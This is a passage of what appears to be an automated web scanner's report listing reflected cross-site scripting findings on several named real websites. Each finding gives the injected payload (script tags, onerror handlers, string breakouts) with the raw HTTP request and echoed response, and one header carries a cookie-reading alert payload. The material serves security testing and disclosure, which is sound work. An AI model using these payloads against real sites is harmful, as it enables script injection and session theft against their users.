GET /landing/softwaretraining.aspx?AWKeyWord=Joomla!&CourseURL=http%3a%2f%2fwww.lynda.com%2fhome%2fViewCourses.aspx%3flpk0%3d370&Ptitle=Joomla+Tutorials+and+Training+Onlineafa34</title><script>alert(1)</script>90dcbb388f5&_kk=joomla%20course&_kt=546081e7-492f-4261-b08e-49b0a582fb58/ HTTP/1.1
Host: www.lynda.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=KWWVWPSw6CYMJ; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=sgglef2wm5e5dfjij2bmrt3s; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=sgglef2wm5e5dfjij2bmrt3s; path=/; HttpOnly
Set-Cookie: course_settings_0=; expires=Mon, 14-Feb-2011 04:44:50 GMT; path=/
Set-Cookie: SITE=OLD; expires=Tue, 08-Feb-2011 04:44:50 GMT; path=/
Set-Cookie: TollFree=3; expires=Tue, 08-Feb-2011 04:44:50 GMT; path=/
X-Powered-By: ASP.NET
From: 284445-web6
Date: Tue, 25 Jan 2011 04:44:50 GMT
Connection: close
Content-Length: 24710

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1">
<!-- Google
...[SNIP]...
<title>
Joomla Tutorials and Training Onlineafa34</title><script>alert(1)</script>90dcbb388f5
</title>
...[SNIP]...

4.1250. http://www.masjo.com/search/learn+typing+quick+and+easy+crack/page/419/x22 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.masjo.com
Path:	/search/learn+typing+quick+and+easy+crack/page/419/x22

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a074f<script>alert(1)</script>c4a5acfda9b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search/learn+typing+quick+and+easy+cracka074f<script>alert(1)</script>c4a5acfda9b/page/419/x22 HTTP/1.1
Host: www.masjo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:03:31 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/4.4.9 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.2.15
Vary: Cookie
X-Pingback: http://www.masjo.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57041

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<span class="archive_header">Search results for 'learn typing quick and easy cracka074f<script>alert(1)</script>c4a5acfda9b/page/419/x22'</span>
...[SNIP]...

4.1251. http://www.masjo.com/search/learn+typing+quick+and+easy+crack/page/419/x22 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.masjo.com
Path:	/search/learn+typing+quick+and+easy+crack/page/419/x22

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 9e35f<script>alert(1)</script>b85cc6a8b1d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search/learn+typing+quick+and+easy+crack/page9e35f<script>alert(1)</script>b85cc6a8b1d/419/x22 HTTP/1.1
Host: www.masjo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:04:26 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/4.4.9 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.2.15
Vary: Cookie
X-Pingback: http://www.masjo.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56844

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<span class="archive_header">Search results for 'learn typing quick and easy crack/page9e35f<script>alert(1)</script>b85cc6a8b1d/419/x22'</span>
...[SNIP]...

4.1252. http://www.masjo.com/search/learn+typing+quick+and+easy+crack/page/419/x22 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.masjo.com
Path:	/search/learn+typing+quick+and+easy+crack/page/419/x22

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 523b0<script>alert(1)</script>4457b128473 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search/learn+typing+quick+and+easy+crack/page/419523b0<script>alert(1)</script>4457b128473/x22 HTTP/1.1
Host: www.masjo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:05:26 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/4.4.9 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.2.15
Vary: Cookie
X-Pingback: http://www.masjo.com/xmlrpc.php
Content-Length: 56535
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<span class="archive_header">Search results for 'learn typing quick and easy crack/page/419523b0<script>alert(1)</script>4457b128473/x22'</span>
...[SNIP]...

4.1253. http://www.masjo.com/search/learn+typing+quick+and+easy+crack/page/419/x22 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.masjo.com
Path:	/search/learn+typing+quick+and+easy+crack/page/419/x22

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 68220<script>alert(1)</script>b9ef2a5c755 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search/learn+typing+quick+and+easy+crack/page/419/x2268220<script>alert(1)</script>b9ef2a5c755 HTTP/1.1
Host: www.masjo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:06:37 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/4.4.9 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.2.15
Vary: Cookie
X-Pingback: http://www.masjo.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56668

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<span class="archive_header">Search results for 'learn typing quick and easy crack/page/419/x2268220<script>alert(1)</script>b9ef2a5c755'</span>
...[SNIP]...

4.1254. http://www.mathias-bank.de/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.mathias-bank.de
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52bf6"><script>alert(1)</script>b9c613ef1ae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 52bf6\"><script>alert(1)</script>b9c613ef1ae in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?52bf6"><script>alert(1)</script>b9c613ef1ae=1 HTTP/1.1
Host: www.mathias-bank.de
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:44:37 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Pingback: http://www.mathias-bank.de/xmlrpc.php
Set-Cookie: bb2_screener_=1295930677+173.193.214.243; path=/
Set-Cookie: PHPSESSID=2066f5014dd99ed5895639ad60fa9529; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55124

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/x
...[SNIP]...
<form enctype="multipart/form-data" action="/?52bf6\"><script>alert(1)</script>b9c613ef1ae=1#usermessagea" method="post" class="cform" id="cformsform">
...[SNIP]...

4.1255. http://www.mensfitness.com/Tshirt_Workout/fitness/ab_exercises/136 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.mensfitness.com
Path:	/Tshirt_Workout/fitness/ab_exercises/136

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8c10"><a>3ada40ed7f6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /e8c10"><a>3ada40ed7f6/fitness/ab_exercises/136 HTTP/1.1
Host: www.mensfitness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:46:02 GMT
Server: Apache/2.2.3 (Red Hat)
Age: 2
Cache-Control: max-age=43197
Via: HTTP/1.1 cdn.mensfitness.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 16:45:57 GMT
Content-Type: text/html; charset=UTF-8
Via: 1.1 mdw107113 (MII-APC/1.6)
Connection: close
Content-Length: 45359

<html>
<head>

<title>The T-Shirt Body Workout - Men's Fitness</title>

<meta name="Description" content="Fill out your favorite tee with our exclusive eight-week program for bigger shoulders, chest,
...[SNIP]...
<a href="/e8c10"><a>3ada40ed7f6/fitness/ab_exercises/136?page=2">
...[SNIP]...

4.1256. http://www.mensfitness.com/Tshirt_Workout/fitness/ab_exercises/136 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.mensfitness.com
Path:	/Tshirt_Workout/fitness/ab_exercises/136

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ff40"><img%20src%3da%20onerror%3dalert(1)>d8f23d3077c was submitted in the REST URL parameter 1. This input was echoed as 1ff40"><img src=a onerror=alert(1)>d8f23d3077c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /Tshirt_Workout1ff40"><img%20src%3da%20onerror%3dalert(1)>d8f23d3077c/fitness/ab_exercises/136?cid=RSS HTTP/1.1
Host: www.mensfitness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:46:58 GMT
Server: Apache/2.2.3 (Red Hat)
Age: 3
Cache-Control: max-age=43197
Via: HTTP/1.1 cdn.mensfitness.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 16:46:54 GMT
Content-Type: text/html; charset=UTF-8
Via: 1.1 mdw107104 (MII-APC/1.6)
Connection: close
Content-Length: 45515

<html>
<head>

<title>The T-Shirt Body Workout - Men's Fitness</title>

<meta name="Description" content="Fill out your favorite tee with our exclusive eight-week program for bigger shoulders, chest,
...[SNIP]...
<a href="/Tshirt_Workout1ff40"><img src=a onerror=alert(1)>d8f23d3077c/fitness/ab_exercises/136?page=2">
...[SNIP]...

4.1257. http://www.mensfitness.com/Tshirt_Workout/fitness/ab_exercises/136 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.mensfitness.com
Path:	/Tshirt_Workout/fitness/ab_exercises/136

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload bbc05--><img%20src%3da%20onerror%3dalert(1)>8f6acbad9ad was submitted in the REST URL parameter 1. This input was echoed as bbc05--><img src=a onerror=alert(1)>8f6acbad9ad in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /Tshirt_Workoutbbc05--><img%20src%3da%20onerror%3dalert(1)>8f6acbad9ad/fitness/ab_exercises/136?cid=RSS HTTP/1.1
Host: www.mensfitness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:47:22 GMT
Server: Apache/2.2.3 (Red Hat)
Age: 0
Cache-Control: max-age=43199
Via: HTTP/1.1 cdn.mensfitness.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 16:47:21 GMT
Content-Type: text/html; charset=UTF-8
Via: 1.1 mdw107109 (MII-APC/1.6)
Connection: close
Content-Length: 45519

<html>
<head>

<title>The T-Shirt Body Workout - Men's Fitness</title>

<meta name="Description" content="Fill out your favorite tee with our exclusive eight-week program for bigger shoulders, chest,
...[SNIP]...
<a href="/Tshirt_Workoutbbc05--><img src=a onerror=alert(1)>8f6acbad9ad/fitness/ab_exercises/136?page=2">
...[SNIP]...

4.1258. http://www.metacafe.com/fplayer/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.metacafe.com
Path:	/fplayer/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16b81"><script>alert(1)</script>80bba3d2c73 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fplayer/?16b81"><script>alert(1)</script>80bba3d2c73=1 HTTP/1.1
Host: www.metacafe.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

4.1259. http://www.mister-wong.com/index.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.mister-wong.com
Path:	/index.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f804"><img%20src%3da%20onerror%3dalert(1)>65919bb3738 was submitted in the REST URL parameter 1. This input was echoed as 5f804"><img src=a onerror=alert(1)>65919bb3738 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /index.php5f804"><img%20src%3da%20onerror%3dalert(1)>65919bb3738?action=addurl&bm_url={u}&bm_description={t} HTTP/1.1
Host: www.mister-wong.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 04:48:46 GMT
Server: Apache
Set-Cookie: wongsess=9c8cde65c0dd40716ec19743fefa9f7f; expires=Fri, 25 Jan 2036 10:48:46 GMT; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 5394
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"
...[SNIP]...
<div id="main" class="c_index.php5f804"><img src=a onerror=alert(1)>65919bb3738">
...[SNIP]...

4.1260. https://www.mytraderonline.com/css/promoCSS.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.mytraderonline.com
Path:	/css/promoCSS.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload fe3fe<script>alert(1)</script>0c8a8ecd74d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cssfe3fe<script>alert(1)</script>0c8a8ecd74d/promoCSS.php HTTP/1.1
Host: www.mytraderonline.com
Connection: keep-alive
Referer: https://www.mytraderonline.com/myt8ac25%3Cscript%3Ealert(document.cookie)%3C/script%3E9d5249ed1b2/sign-in/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 02:29:40 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13 mod_ssl/2.0.63 OpenSSL/0.9.8l
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 26482

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Information fourofour TraderOnline.com, Trader Magazines, and TraderOnline family sites. – TraderOnline.com
...[SNIP]...
<span style="color:red;">/cssfe3fe<script>alert(1)</script>0c8a8ecd74d/promoCSS.php</span>
...[SNIP]...

4.1261. https://www.mytraderonline.com/css/tolhomecss.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.mytraderonline.com
Path:	/css/tolhomecss.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e53d4<script>alert(1)</script>05046dfdb22 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /csse53d4<script>alert(1)</script>05046dfdb22/tolhomecss.php HTTP/1.1
Host: www.mytraderonline.com
Connection: keep-alive
Referer: https://www.mytraderonline.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_nr%3D1295921299027%7C1298513299027%3B%20s_lv%3D1295921299028%7C1390529299028%3B%20s_lv_s%3DFirst%2520Visit%7C1295923099028%3B; s_sess=%20s_cc%3Dtrue%3B%20s_evar2%3DData%2520Not%2520Available%3B%20s_evar3%3DData%2520Not%2520Available%3B%20s_evar4%3DData%2520Not%2520Available%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 02:29:50 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13 mod_ssl/2.0.63 OpenSSL/0.9.8l
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 26484

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Information fourofour TraderOnline.com, Trader Magazines, and TraderOnline family sites. – TraderOnline.com
...[SNIP]...
<span style="color:red;">/csse53d4<script>alert(1)</script>05046dfdb22/tolhomecss.php</span>
...[SNIP]...

4.1262. https://www.mytraderonline.com/javascript/master_s_code.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.mytraderonline.com
Path:	/javascript/master_s_code.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload fe8c5<script>alert(1)</script>e83e0eff03b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /javascriptfe8c5<script>alert(1)</script>e83e0eff03b/master_s_code.js HTTP/1.1
Host: www.mytraderonline.com
Connection: keep-alive
Referer: https://www.mytraderonline.com/myt8ac25%3Cscript%3Ealert(document.cookie)%3C/script%3E9d5249ed1b2/sign-in/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 02:29:26 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13 mod_ssl/2.0.63 OpenSSL/0.9.8l
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 26493

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Information fourofour TraderOnline.com, Trader Magazines, and TraderOnline family sites. – TraderOnline.com
...[SNIP]...
<span style="color:red;">/javascriptfe8c5<script>alert(1)</script>e83e0eff03b/master_s_code.js</span>
...[SNIP]...

4.1263. https://www.mytraderonline.com/javascript/realmedia.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.mytraderonline.com
Path:	/javascript/realmedia.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e904d<script>alert(1)</script>f127adaefca was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /javascripte904d<script>alert(1)</script>f127adaefca/realmedia.js HTTP/1.1
Host: www.mytraderonline.com
Connection: keep-alive
Referer: https://www.mytraderonline.com/myt8ac25%3Cscript%3Ealert(document.cookie)%3C/script%3E9d5249ed1b2/sign-in/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 02:29:29 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13 mod_ssl/2.0.63 OpenSSL/0.9.8l
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 26489

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Information fourofour TraderOnline.com, Trader Magazines, and TraderOnline family sites. – TraderOnline.com
...[SNIP]...
<span style="color:red;">/javascripte904d<script>alert(1)</script>f127adaefca/realmedia.js</span>
...[SNIP]...

4.1264. https://www.mytraderonline.com/myt/sign-in/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.mytraderonline.com
Path:	/myt/sign-in/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8ac25<script>alert(1)</script>9d5249ed1b2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /myt8ac25<script>alert(1)</script>9d5249ed1b2/sign-in/ HTTP/1.1
Host: www.mytraderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:08:47 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13 mod_ssl/2.0.63 OpenSSL/0.9.8l
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 26478

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Information fourofour TraderOnline.com, Trader Magazines, and TraderOnline family sites. – TraderOnline.com
...[SNIP]...
<span style="color:red;">/myt8ac25<script>alert(1)</script>9d5249ed1b2/sign-in/</span>
...[SNIP]...

4.1265. https://www.mytraderonline.com/myt/sign-in/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.mytraderonline.com
Path:	/myt/sign-in/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b7b9e<script>alert(1)</script>9cd61b35c5c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /myt/sign-inb7b9e<script>alert(1)</script>9cd61b35c5c/ HTTP/1.1
Host: www.mytraderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:08:54 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13 mod_ssl/2.0.63 OpenSSL/0.9.8l
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 26478

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Information fourofour TraderOnline.com, Trader Magazines, and TraderOnline family sites. – TraderOnline.com
...[SNIP]...
<span style="color:red;">/myt/sign-inb7b9e<script>alert(1)</script>9cd61b35c5c/</span>
...[SNIP]...

4.1266. https://www.mytraderonline.com/myt/sign-in/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.mytraderonline.com
Path:	/myt/sign-in/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5be1d"%3balert(1)//85941d9f6ff was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5be1d";alert(1)//85941d9f6ff in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /myt/sign-in/?5be1d"%3balert(1)//85941d9f6ff=1 HTTP/1.1
Host: www.mytraderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:08:32 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13 mod_ssl/2.0.63 OpenSSL/0.9.8l
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 33916

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>MyTrader - Save, Modify, Delete Vehicles for Sale - TraderOnline.com</title>
<meta name="description" content="U
...[SNIP]...
<SCRIPT>DisplayAds("traderonline","www.traderonline.com/", "", "", "?5be1d";alert(1)//85941d9f6ff=1&","Right1","0","0")</SCRIPT>
...[SNIP]...

4.1267. http://www.netlingo.com/add-edit/editor-guidelines.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/add-edit/editor-guidelines.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2e7db"-alert(1)-"eeac52a4325 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /add-edit/editor-guidelines.php?2e7db"-alert(1)-"eeac52a4325=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
